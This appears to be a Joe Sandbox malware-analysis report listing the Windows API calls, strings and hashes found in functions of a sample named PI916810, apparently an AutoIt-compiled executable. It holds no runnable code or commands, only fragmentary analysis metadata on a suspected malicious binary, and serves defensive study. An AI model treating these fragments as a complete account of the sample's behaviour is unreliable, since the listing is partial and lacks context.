• API String ID: 314563124-289689913
APIs
• VariantInit.OLEAUT32(?), ref: 004D8928
• CharUpperBuffW.USER32(?,?), ref: 004D8A37
• VariantClear.OLEAUT32(?), ref: 004D8BAF
  • Part of subcall function 004C7804: VariantInit.OLEAUT32(00000000), ref: 004C7844
  • Part of subcall function 004C7804: VariantCopy.OLEAUT32(00000000,?), ref: 004C784D
  • Part of subcall function 004C7804: VariantClear.OLEAUT32(00000000), ref: 004C7859
Strings
Similarity
• API ID: Variant$ClearInit$BuffCharCopyUpper
• String ID: AUTOIT.ERROR$Incorrect Parameter format
• API String ID: 4237274167-1221869570
APIs
  • Part of subcall function 0047FEC6: _wcscpy.LIBCMT ref: 0047FEE9
• _memset.LIBCMT ref: 004C3077
• GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 004C30A6
• SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 004C3159
• SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 004C3187
Strings
Similarity
• API ID: ItemMenu$Info$Default_memset_wcscpy
• String ID: 0
• API String ID: 4152858687-4108050209
APIs
• _memset.LIBCMT ref: 004C2CAF
• GetMenuItemInfoW.USER32(00000004,00000000,00000000,?), ref: 004C2CCB
• DeleteMenu.USER32(?,00000007,00000000), ref: 004C2D11
• DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,00526890,00000000), ref: 004C2D5A
Strings
Similarity
• API ID: Menu$Delete$InfoItem_memset
• String ID: 0
• API String ID: 1173514356-4108050209
APIs
  • Part of subcall function 00467F41: _memmove.LIBCMT ref: 00467F82
  • Part of subcall function 004BB0C4: GetClassNameW.USER32(?,?,000000FF), ref: 004BB0E7
• SendMessageW.USER32(?,00000188,00000000,00000000), ref: 004B93F6
• SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 004B9409
• SendMessageW.USER32(?,00000189,?,00000000), ref: 004B9439
  • Part of subcall function 00467D2C: _memmove.LIBCMT ref: 00467D66
Strings
Similarity
• API ID: MessageSend$_memmove$ClassName
• String ID: ComboBox$ListBox
• API String ID: 365058703-1403004172
APIs
• LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 0049D5EC
  • Part of subcall function 00467D2C: _memmove.LIBCMT ref: 00467D66
• _memset.LIBCMT ref: 0046418D
• _wcscpy.LIBCMT ref: 004641E1
• Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 004641F1
Strings
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: IconLoadNotifyShell_String_memmove_memset_wcscpy
                                                                                                                                                                            • String ID: Line:
                                                                                                                                                                            • API String ID: 3942752672-1585850449
                                                                                                                                                                            • Opcode ID: d1eb1d7d543749643c94dd76fec346195f6f1cba7f959f64806754e0e1073281
                                                                                                                                                                            • Instruction ID: ec17e0a79ab0c9afedcd809f3ec9d479820a4816f011c63e81abf42008975b43
                                                                                                                                                                            • Opcode Fuzzy Hash: d1eb1d7d543749643c94dd76fec346195f6f1cba7f959f64806754e0e1073281
                                                                                                                                                                            • Instruction Fuzzy Hash: C231E471408304AAD731EB60DC45FDB77E8AF56308F10491FF585921A1FB78A649C79B
                                                                                                                                                                            APIs
                                                                                                                                                                              • Part of subcall function 00461D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00461D73
                                                                                                                                                                              • Part of subcall function 00461D35: GetStockObject.GDI32(00000011), ref: 00461D87
                                                                                                                                                                              • Part of subcall function 00461D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00461D91
                                                                                                                                                                            • SendMessageW.USER32(00000000,00000467,00000000,?), ref: 004E66D0
                                                                                                                                                                            • LoadLibraryW.KERNEL32(?), ref: 004E66D7
                                                                                                                                                                            • SendMessageW.USER32(?,00000467,00000000,00000000), ref: 004E66EC
                                                                                                                                                                            • DestroyWindow.USER32(?), ref: 004E66F4
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2037034054.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2037013479.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.0000000000515000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037134858.000000000051F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037285806.0000000000528000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_460000_PI916810.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: MessageSend$Window$CreateDestroyLibraryLoadObjectStock
                                                                                                                                                                            • String ID: SysAnimate32
                                                                                                                                                                            • API String ID: 4146253029-1011021900
                                                                                                                                                                            • Opcode ID: 8032c9338277e55e68cd3a56d07b5b7a393a4bdec36b8181c46c4939b1242cbb
                                                                                                                                                                            • Instruction ID: 9f361790fe077729a2df4e398215fb0f48ad9093b53f601b5b77b981190e5d88
                                                                                                                                                                            • Opcode Fuzzy Hash: 8032c9338277e55e68cd3a56d07b5b7a393a4bdec36b8181c46c4939b1242cbb
                                                                                                                                                                            • Instruction Fuzzy Hash: FF21C271110245AFEF104F76EC80EBB37ADEF693A9F11062AF91096290D775DC419768
                                                                                                                                                                            APIs
                                                                                                                                                                            • GetStdHandle.KERNEL32(0000000C), ref: 004C705E
                                                                                                                                                                            • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 004C7091
                                                                                                                                                                            • GetStdHandle.KERNEL32(0000000C), ref: 004C70A3
                                                                                                                                                                            • CreateFileW.KERNEL32(nul,40000000,00000002,0000000C,00000003,00000080,00000000), ref: 004C70DD
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2037034054.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2037013479.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.0000000000515000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037134858.000000000051F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037285806.0000000000528000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_460000_PI916810.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: CreateHandle$FilePipe
                                                                                                                                                                            • String ID: nul
                                                                                                                                                                            • API String ID: 4209266947-2873401336
                                                                                                                                                                            • Opcode ID: c3bee6c2a6443b046b325bbe8a8776bdea27c53e00e2e72c34ff317d7151a346
                                                                                                                                                                            • Instruction ID: 3f1ac80719f4daed3f8755a7dec3ae1ec31774e5d7bb027f334403842d364f42
                                                                                                                                                                            • Opcode Fuzzy Hash: c3bee6c2a6443b046b325bbe8a8776bdea27c53e00e2e72c34ff317d7151a346
                                                                                                                                                                            • Instruction Fuzzy Hash: E32183785042099BDB609F3ADC45F9A7BA8BF44724F208A2EFDA0D72D0D77598408F59
                                                                                                                                                                            APIs
                                                                                                                                                                            • GetStdHandle.KERNEL32(000000F6), ref: 004C712B
                                                                                                                                                                            • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 004C715D
                                                                                                                                                                            • GetStdHandle.KERNEL32(000000F6), ref: 004C716E
                                                                                                                                                                            • CreateFileW.KERNEL32(nul,80000000,00000001,0000000C,00000003,00000080,00000000), ref: 004C71A8
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2037034054.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2037013479.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.0000000000515000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037134858.000000000051F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037285806.0000000000528000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_460000_PI916810.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: CreateHandle$FilePipe
                                                                                                                                                                            • String ID: nul
                                                                                                                                                                            • API String ID: 4209266947-2873401336
                                                                                                                                                                            • Opcode ID: f366c0f331b4738bd978fad7b5fb16746a7f8c5b12952ad1317543993c6afced
                                                                                                                                                                            • Instruction ID: 1571dcc6652564dc9ff5a9a91f56cfed05acb8885fefe2fa5c00a5dd411d97a0
                                                                                                                                                                            • Opcode Fuzzy Hash: f366c0f331b4738bd978fad7b5fb16746a7f8c5b12952ad1317543993c6afced
                                                                                                                                                                            • Instruction Fuzzy Hash: 8421D3795042099BDB209F699C44F9AB7E8AF45320F244A1EFDE0D73D0DB749841CF59
                                                                                                                                                                            APIs
                                                                                                                                                                            • SetErrorMode.KERNEL32(00000001), ref: 004CAEBF
                                                                                                                                                                            • GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 004CAF13
                                                                                                                                                                            • __swprintf.LIBCMT ref: 004CAF2C
                                                                                                                                                                            • SetErrorMode.KERNEL32(00000000,00000001,00000000,004EF910), ref: 004CAF6A
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2037034054.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2037013479.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.0000000000515000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037134858.000000000051F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037285806.0000000000528000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_460000_PI916810.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: ErrorMode$InformationVolume__swprintf
                                                                                                                                                                            • String ID: %lu
                                                                                                                                                                            • API String ID: 3164766367-685833217
                                                                                                                                                                            • Opcode ID: 25fa76f18e0d5181c7db7e8f3d1c543a907218045d88f2a7d0f5d8baae87684e
                                                                                                                                                                            • Instruction ID: d48e12327bce1d0fea53c20a4e0c91e67162e1fb574746975fad3b47cc6ea4dd
                                                                                                                                                                            • Opcode Fuzzy Hash: 25fa76f18e0d5181c7db7e8f3d1c543a907218045d88f2a7d0f5d8baae87684e
                                                                                                                                                                            • Instruction Fuzzy Hash: 43217434A00149AFCB10EF55C985EEE7BB8EF89708B10406EF505DB252DB75EE45CB25
                                                                                                                                                                            APIs
                                                                                                                                                                              • Part of subcall function 00467D2C: _memmove.LIBCMT ref: 00467D66
                                                                                                                                                                              • Part of subcall function 004BA37C: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 004BA399
                                                                                                                                                                              • Part of subcall function 004BA37C: GetWindowThreadProcessId.USER32(?,00000000), ref: 004BA3AC
                                                                                                                                                                              • Part of subcall function 004BA37C: GetCurrentThreadId.KERNEL32 ref: 004BA3B3
                                                                                                                                                                              • Part of subcall function 004BA37C: AttachThreadInput.USER32(00000000), ref: 004BA3BA
                                                                                                                                                                            • GetFocus.USER32 ref: 004BA554
                                                                                                                                                                              • Part of subcall function 004BA3C5: GetParent.USER32(?), ref: 004BA3D3
                                                                                                                                                                            • GetClassNameW.USER32(?,?,00000100), ref: 004BA59D
                                                                                                                                                                            • EnumChildWindows.USER32(?,004BA615), ref: 004BA5C5
                                                                                                                                                                            • __swprintf.LIBCMT ref: 004BA5DF
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2037034054.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2037013479.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.0000000000515000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037134858.000000000051F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037285806.0000000000528000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_460000_PI916810.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Thread$AttachChildClassCurrentEnumFocusInputMessageNameParentProcessSendTimeoutWindowWindows__swprintf_memmove
                                                                                                                                                                            • String ID: %s%d
                                                                                                                                                                            • API String ID: 1941087503-1110647743
                                                                                                                                                                            • Opcode ID: 6e5c35abc903a4983e1075440739b868243a42e65763a57ca7bfdba1c431a740
                                                                                                                                                                            • Instruction ID: b55d46d40ab0b09d58707b048079c54725b5e3833a887eb9234ea8c0dfed08e0
                                                                                                                                                                            • Opcode Fuzzy Hash: 6e5c35abc903a4983e1075440739b868243a42e65763a57ca7bfdba1c431a740
                                                                                                                                                                            • Instruction Fuzzy Hash: 4B11A2B16002086BDF107F71DC85FEA37B8AF48704F04407ABE18AA152DA7859558B7E
                                                                                                                                                                            APIs
                                                                                                                                                                            • CharUpperBuffW.USER32(?,?), ref: 004C2048
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2037034054.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2037013479.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.0000000000515000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037134858.000000000051F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037285806.0000000000528000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_460000_PI916810.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: BuffCharUpper
                                                                                                                                                                            • String ID: APPEND$EXISTS$KEYS$REMOVE
                                                                                                                                                                            • API String ID: 3964851224-769500911
                                                                                                                                                                            • Opcode ID: 68295b174edffc0e18e624f286be25897e4b79ab3ab437480915784f4509929c
                                                                                                                                                                            • Instruction ID: bda2e3f4bc36c890cd98b5d17a0a52bf3e1e56e9f664eb429ef35cb17787f25d
                                                                                                                                                                            • Opcode Fuzzy Hash: 68295b174edffc0e18e624f286be25897e4b79ab3ab437480915784f4509929c
                                                                                                                                                                            • Instruction Fuzzy Hash: 97117934A501199FDF40EFA5C9809EEB7F0BF15308B10886ED951AB352EB76690ACB45
                                                                                                                                                                            APIs
                                                                                                                                                                            • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 004DEF1B
                                                                                                                                                                            • GetProcessIoCounters.KERNEL32(00000000,?), ref: 004DEF4B
                                                                                                                                                                            • GetProcessMemoryInfo.PSAPI(00000000,?,00000028), ref: 004DF07E
                                                                                                                                                                            • CloseHandle.KERNEL32(?), ref: 004DF0FF
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2037034054.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2037013479.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.0000000000515000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037134858.000000000051F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037285806.0000000000528000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_460000_PI916810.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Process$CloseCountersHandleInfoMemoryOpen
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 2364364464-0
                                                                                                                                                                            • Opcode ID: 6a0778a0592684dab1e48e3cabf2e5c002245c55c12193f95a46f7fe57d46f8d
                                                                                                                                                                            • Instruction ID: 9368488865765e5779371bf77dbfad6dada8c29f108ca24ea8d8bf7dd8c860a7
                                                                                                                                                                            • Opcode Fuzzy Hash: 6a0778a0592684dab1e48e3cabf2e5c002245c55c12193f95a46f7fe57d46f8d
                                                                                                                                                                            • Instruction Fuzzy Hash: CE81A7716003009FD724EF25C896F2AB7E5AF48714F04891FF596DB392E7B5AC048B5A
                                                                                                                                                                            APIs
                                                                                                                                                                              • Part of subcall function 00467F41: _memmove.LIBCMT ref: 00467F82
                                                                                                                                                                              • Part of subcall function 004E10A5: CharUpperBuffW.USER32(?,?,?,?,?,?,?,004E0038,?,?), ref: 004E10BC
                                                                                                                                                                            • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 004E0388
                                                                                                                                                                            • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 004E03C7
                                                                                                                                                                            • RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 004E040E
                                                                                                                                                                            • RegCloseKey.ADVAPI32(?,?), ref: 004E043A
                                                                                                                                                                            • RegCloseKey.ADVAPI32(00000000), ref: 004E0447
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2037034054.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2037013479.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.0000000000515000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037134858.000000000051F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037285806.0000000000528000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_460000_PI916810.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Close$BuffCharConnectEnumOpenRegistryUpper_memmove
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 3440857362-0
                                                                                                                                                                            • Opcode ID: 521557bff157a07f6e0bcab674900e5c48fd66ca574fb191831e3c05a0d37820
                                                                                                                                                                            • Instruction ID: 034ef5732d62f413aaa4effef370675a70fdff7256636e3a03f9a45ea2aa2411
                                                                                                                                                                            • Opcode Fuzzy Hash: 521557bff157a07f6e0bcab674900e5c48fd66ca574fb191831e3c05a0d37820
                                                                                                                                                                            • Instruction Fuzzy Hash: E7515C71208244AFD704EF56C881E6EB7E8FF84309F04892EB59587292EB78E945CB56
                                                                                                                                                                            APIs
                                                                                                                                                                            • GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 004CE88A
                                                                                                                                                                            • GetPrivateProfileSectionW.KERNEL32(?,00000001,00000003,?), ref: 004CE8B3
                                                                                                                                                                            • WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 004CE8F2
                                                                                                                                                                              • Part of subcall function 00469997: __itow.LIBCMT ref: 004699C2
                                                                                                                                                                              • Part of subcall function 00469997: __swprintf.LIBCMT ref: 00469A0C
                                                                                                                                                                            • WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 004CE917
                                                                                                                                                                            • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 004CE91F
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2037034054.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2037013479.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.0000000000515000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037134858.000000000051F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037285806.0000000000528000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_460000_PI916810.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: PrivateProfile$SectionWrite$String$__itow__swprintf
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 1389676194-0
                                                                                                                                                                            • Opcode ID: 9392d554642849f36565eb0ba57f020494ca08ff18ebb7b3f10c6fd717c8d274
                                                                                                                                                                            • Instruction ID: 3328976adb8e747ca308e608732bb4dba01c744879b9b2a0ed7fc4133c1ad097
                                                                                                                                                                            • Opcode Fuzzy Hash: 9392d554642849f36565eb0ba57f020494ca08ff18ebb7b3f10c6fd717c8d274
                                                                                                                                                                            • Instruction Fuzzy Hash: 81514075600205DFCF00EF65C981A6EBBF5EF08314B1480AEE949AB361DB75ED05CB55
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2037034054.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2037013479.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.0000000000515000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037134858.000000000051F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037285806.0000000000528000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_460000_PI916810.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: 5ebda3ada33ad176cd4e05e1458bc72696520257428159ade49042c18ba0d008
                                                                                                                                                                            • Instruction ID: 892e5341830cef8ea8abfa2840ccb6e67c20bfc246729b00d8b6ba1a470783bb
                                                                                                                                                                            • Opcode Fuzzy Hash: 5ebda3ada33ad176cd4e05e1458bc72696520257428159ade49042c18ba0d008
                                                                                                                                                                            • Instruction Fuzzy Hash: BC412835900294AFC720DF29CC88FAABBA4FB09311F144166FC15A73D1C774BD61DA5A
                                                                                                                                                                            APIs
                                                                                                                                                                            • GetCursorPos.USER32(?), ref: 00462357
                                                                                                                                                                            • ScreenToClient.USER32(005267B0,?), ref: 00462374
                                                                                                                                                                            • GetAsyncKeyState.USER32(00000001), ref: 00462399
                                                                                                                                                                            • GetAsyncKeyState.USER32(00000002), ref: 004623A7
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2037034054.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2037013479.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.0000000000515000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037134858.000000000051F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037285806.0000000000528000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_460000_PI916810.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: AsyncState$ClientCursorScreen
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 4210589936-0
                                                                                                                                                                            • Opcode ID: 9f83a16b10e3cc7c770c25415f06ca747575b16d20284a47460a4a262dc35316
                                                                                                                                                                            • Instruction ID: 80a01eb91091bdd9460d03bb4abf2f2840193362d29b70d56a532fc108885c21
                                                                                                                                                                            • Opcode Fuzzy Hash: 9f83a16b10e3cc7c770c25415f06ca747575b16d20284a47460a4a262dc35316
                                                                                                                                                                            • Instruction Fuzzy Hash: 1841D131904255FBCF158F75C884AEABB74FB05324F10436BF82496390D7785990DF9A
APIs
• PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 004B695D
• TranslateAcceleratorW.USER32(?,?,?), ref: 004B69A9
• TranslateMessage.USER32(?), ref: 004B69D2
• DispatchMessageW.USER32(?), ref: 004B69DC
• PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 004B69EB
Memory Dump Source
• Source File: 00000000.00000002.2037034054.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
• Associated: 00000000.00000002.2037013479.0000000000460000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2037090221.00000000004EF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2037090221.0000000000515000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2037134858.000000000051F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2037285806.0000000000528000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_460000_PI916810.jbxd
Similarity
• API ID: Message$PeekTranslate$AcceleratorDispatch
• String ID:
• API String ID: 2108273632-0
APIs
• GetWindowRect.USER32(?,?), ref: 004B8F12
• PostMessageW.USER32(?,00000201,00000001), ref: 004B8FBC
• Sleep.KERNEL32(00000000,?,00000201,00000001,?,?,?), ref: 004B8FC4
• PostMessageW.USER32(?,00000202,00000000), ref: 004B8FD2
• Sleep.KERNEL32(00000000,?,00000202,00000000,?,?,00000201,00000001,?,?,?), ref: 004B8FDA
Similarity
• API ID: MessagePostSleep$RectWindow
• String ID:
• API String ID: 3382505437-0
APIs
• IsWindowVisible.USER32(?), ref: 004BB6C7
• SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 004BB6E4
• SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 004BB71C
• CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 004BB742
• _wcsstr.LIBCMT ref: 004BB74C
Similarity
• API ID: MessageSend$BuffCharUpperVisibleWindow_wcsstr
• String ID:
• API String ID: 3902887630-0
APIs
  • Part of subcall function 00462612: GetWindowLongW.USER32(?,000000EB), ref: 00462623
• GetWindowLongW.USER32(?,000000F0), ref: 004EB44C
• SetWindowLongW.USER32(00000000,000000F0,00000001), ref: 004EB471
• SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 004EB489
• GetSystemMetrics.USER32(00000004), ref: 004EB4B2
• SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000047,?,?,?,?,?,?,?,004D1184,00000000), ref: 004EB4D0
Similarity
• API ID: Window$Long$MetricsSystem
• String ID:
• API String ID: 2294984445-0
APIs
• SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004B9802
  • Part of subcall function 00467D2C: _memmove.LIBCMT ref: 00467D66
